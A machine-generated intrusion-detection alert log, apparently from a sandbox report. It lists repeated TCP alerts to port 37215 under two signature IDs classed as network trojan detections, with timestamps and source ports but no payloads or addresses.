                  Timestamp:07/10/24-08:26:23.296739
                  SID:2829579
                  Source Port:41674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.214710
                  SID:2835222
                  Source Port:37144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.299032
                  SID:2835222
                  Source Port:46412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.401175
                  SID:2829579
                  Source Port:43864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.517439
                  SID:2835222
                  Source Port:36848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.209448
                  SID:2835222
                  Source Port:57862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.861688
                  SID:2835222
                  Source Port:37284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.080140
                  SID:2829579
                  Source Port:34682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.566038
                  SID:2829579
                  Source Port:58642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.096498
                  SID:2835222
                  Source Port:50160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469526
                  SID:2835222
                  Source Port:46672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.053322
                  SID:2835222
                  Source Port:40926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.505236
                  SID:2835222
                  Source Port:54692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.762388
                  SID:2835222
                  Source Port:50386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.149592
                  SID:2835222
                  Source Port:38714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.815313
                  SID:2829579
                  Source Port:47304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389862
                  SID:2835222
                  Source Port:49996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.710286
                  SID:2835222
                  Source Port:35042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.848848
                  SID:2835222
                  Source Port:37622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.850187
                  SID:2829579
                  Source Port:36770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.845184
                  SID:2829579
                  Source Port:47732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.148886
                  SID:2829579
                  Source Port:37166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.065729
                  SID:2835222
                  Source Port:42832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.829314
                  SID:2835222
                  Source Port:46688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.457605
                  SID:2829579
                  Source Port:60360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.722420
                  SID:2829579
                  Source Port:59176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.625471
                  SID:2829579
                  Source Port:52956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.343143
                  SID:2835222
                  Source Port:38630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.481265
                  SID:2829579
                  Source Port:40886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.267667
                  SID:2829579
                  Source Port:50578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.227132
                  SID:2829579
                  Source Port:33556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.222864
                  SID:2829579
                  Source Port:46308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.561854
                  SID:2829579
                  Source Port:55182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.976199
                  SID:2835222
                  Source Port:38862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.323011
                  SID:2829579
                  Source Port:59618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384397
                  SID:2835222
                  Source Port:56094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.473700
                  SID:2835222
                  Source Port:40406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.986988
                  SID:2835222
                  Source Port:55874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.545820
                  SID:2829579
                  Source Port:60336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.824786
                  SID:2835222
                  Source Port:57240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.289517
                  SID:2835222
                  Source Port:53466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.759189
                  SID:2835222
                  Source Port:43964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.594739
                  SID:2829579
                  Source Port:43244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.842336
                  SID:2829579
                  Source Port:55832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.444782
                  SID:2835222
                  Source Port:41358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.822671
                  SID:2835222
                  Source Port:56804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.499192
                  SID:2835222
                  Source Port:48108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.980831
                  SID:2829579
                  Source Port:57124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.764641
                  SID:2829579
                  Source Port:47870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.048975
                  SID:2835222
                  Source Port:56430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.189535
                  SID:2835222
                  Source Port:41914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.901857
                  SID:2835222
                  Source Port:48110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.647124
                  SID:2835222
                  Source Port:45448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.825878
                  SID:2829579
                  Source Port:52720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.365673
                  SID:2829579
                  Source Port:40040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.522324
                  SID:2835222
                  Source Port:53004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.229279
                  SID:2829579
                  Source Port:52538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.810296
                  SID:2829579
                  Source Port:57096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.845766
                  SID:2829579
                  Source Port:34972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.260009
                  SID:2829579
                  Source Port:59518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.296464
                  SID:2829579
                  Source Port:49012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.553494
                  SID:2835222
                  Source Port:40864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.178441
                  SID:2829579
                  Source Port:43178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.773656
                  SID:2829579
                  Source Port:53618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.994368
                  SID:2835222
                  Source Port:40982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.967475
                  SID:2829579
                  Source Port:49258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.872450
                  SID:2835222
                  Source Port:49550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.712804
                  SID:2829579
                  Source Port:42544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.890637
                  SID:2829579
                  Source Port:54518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.764510
                  SID:2829579
                  Source Port:39532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.875784
                  SID:2835222
                  Source Port:53110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.843292
                  SID:2835222
                  Source Port:50880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.964289
                  SID:2835222
                  Source Port:44054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.882583
                  SID:2829579
                  Source Port:54330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.147329
                  SID:2835222
                  Source Port:35754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.149961
                  SID:2835222
                  Source Port:47512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.054168
                  SID:2829579
                  Source Port:52160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.432411
                  SID:2835222
                  Source Port:44730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.175681
                  SID:2835222
                  Source Port:55194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.505996
                  SID:2829579
                  Source Port:44926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.044301
                  SID:2829579
                  Source Port:53962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.157992
                  SID:2829579
                  Source Port:38812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.638675
                  SID:2829579
                  Source Port:49878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.540694
                  SID:2829579
                  Source Port:42228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.804440
                  SID:2835222
                  Source Port:57030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.842047
                  SID:2829579
                  Source Port:37414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.525521
                  SID:2835222
                  Source Port:37858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.911358
                  SID:2835222
                  Source Port:36410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.829159
                  SID:2829579
                  Source Port:52766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.391296
                  SID:2829579
                  Source Port:52156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.165793
                  SID:2829579
                  Source Port:58264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.351340
                  SID:2835222
                  Source Port:37228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.798485
                  SID:2835222
                  Source Port:38940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.646162
                  SID:2835222
                  Source Port:32876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.782105
                  SID:2835222
                  Source Port:50196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.046551
                  SID:2829579
                  Source Port:33236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.115626
                  SID:2829579
                  Source Port:57432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.160922
                  SID:2829579
                  Source Port:34206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.757502
                  SID:2835222
                  Source Port:60080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.147073
                  SID:2835222
                  Source Port:34962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.904329
                  SID:2829579
                  Source Port:39816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.781993
                  SID:2835222
                  Source Port:60408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.583126
                  SID:2835222
                  Source Port:33932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.124303
                  SID:2835222
                  Source Port:35792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.805263
                  SID:2835222
                  Source Port:39264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.029316
                  SID:2829579
                  Source Port:53282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.462014
                  SID:2835222
                  Source Port:44834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.794117
                  SID:2829579
                  Source Port:40420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.505236
                  SID:2829579
                  Source Port:35312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.848965
                  SID:2829579
                  Source Port:39922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.416041
                  SID:2835222
                  Source Port:41456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.600322
                  SID:2829579
                  Source Port:57676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.318439
                  SID:2829579
                  Source Port:48056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.647215
                  SID:2835222
                  Source Port:53396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.863856
                  SID:2829579
                  Source Port:50214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.483552
                  SID:2835222
                  Source Port:44876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.554378
                  SID:2835222
                  Source Port:41660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.965193
                  SID:2829579
                  Source Port:37650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.100139
                  SID:2829579
                  Source Port:60084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.748611
                  SID:2829579
                  Source Port:60022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.951496
                  SID:2835222
                  Source Port:54696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.385605
                  SID:2829579
                  Source Port:52250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.872706
                  SID:2829579
                  Source Port:57884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.665617
                  SID:2829579
                  Source Port:58008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.643057
                  SID:2835222
                  Source Port:36414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.222515
                  SID:2829579
                  Source Port:46778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.408292
                  SID:2829579
                  Source Port:55682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.891994
                  SID:2829579
                  Source Port:59532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.873299
                  SID:2829579
                  Source Port:38058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.880406
                  SID:2835222
                  Source Port:57834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.398015
                  SID:2835222
                  Source Port:46430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.860242
                  SID:2829579
                  Source Port:50034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.814735
                  SID:2829579
                  Source Port:33068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.388281
                  SID:2829579
                  Source Port:38680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.708629
                  SID:2829579
                  Source Port:35116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.866778
                  SID:2835222
                  Source Port:58732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.212749
                  SID:2835222
                  Source Port:46728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.794117
                  SID:2835222
                  Source Port:58588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.853963
                  SID:2835222
                  Source Port:54698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.980422
                  SID:2829579
                  Source Port:34788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.924774
                  SID:2835222
                  Source Port:43858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.820169
                  SID:2829579
                  Source Port:53314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.444782
                  SID:2829579
                  Source Port:51124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.279248
                  SID:2835222
                  Source Port:46002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.322719
                  SID:2835222
                  Source Port:48134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.852239
                  SID:2835222
                  Source Port:51184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.926271
                  SID:2829579
                  Source Port:44340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.622177
                  SID:2835222
                  Source Port:58614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.236925
                  SID:2829579
                  Source Port:44704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.110182
                  SID:2829579
                  Source Port:43094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.588620
                  SID:2835222
                  Source Port:34698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.006085
                  SID:2835222
                  Source Port:37746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.077286
                  SID:2829579
                  Source Port:43476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.134623
                  SID:2829579
                  Source Port:52418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.022407
                  SID:2835222
                  Source Port:56334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.349676
                  SID:2829579
                  Source Port:41904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.008583
                  SID:2829579
                  Source Port:47334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885760
                  SID:2835222
                  Source Port:32806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.499306
                  SID:2835222
                  Source Port:56350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.942204
                  SID:2835222
                  Source Port:57424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.098381
                  SID:2829579
                  Source Port:43868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.234679
                  SID:2835222
                  Source Port:53668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.063157
                  SID:2835222
                  Source Port:48360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.837323
                  SID:2835222
                  Source Port:49864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.340130
                  SID:2835222
                  Source Port:48500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.176573
                  SID:2835222
                  Source Port:33700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.445114
                  SID:2835222
                  Source Port:42494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.513977
                  SID:2829579
                  Source Port:43492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.627157
                  SID:2835222
                  Source Port:55552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.464984
                  SID:2835222
                  Source Port:56822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.594913
                  SID:2835222
                  Source Port:58214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.900792
                  SID:2829579
                  Source Port:57990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.723492
                  SID:2829579
                  Source Port:58440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.784576
                  SID:2835222
                  Source Port:41542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.486233
                  SID:2835222
                  Source Port:39038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.716869
                  SID:2835222
                  Source Port:39212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.912574
                  SID:2829579
                  Source Port:54874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.849427
                  SID:2835222
                  Source Port:51474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.627051
                  SID:2835222
                  Source Port:58684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.521223
                  SID:2835222
                  Source Port:34656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.970861
                  SID:2829579
                  Source Port:58682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.680054
                  SID:2829579
                  Source Port:36022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.070374
                  SID:2835222
                  Source Port:48446
                  Destination Port:37215
                  Protocol:TCP
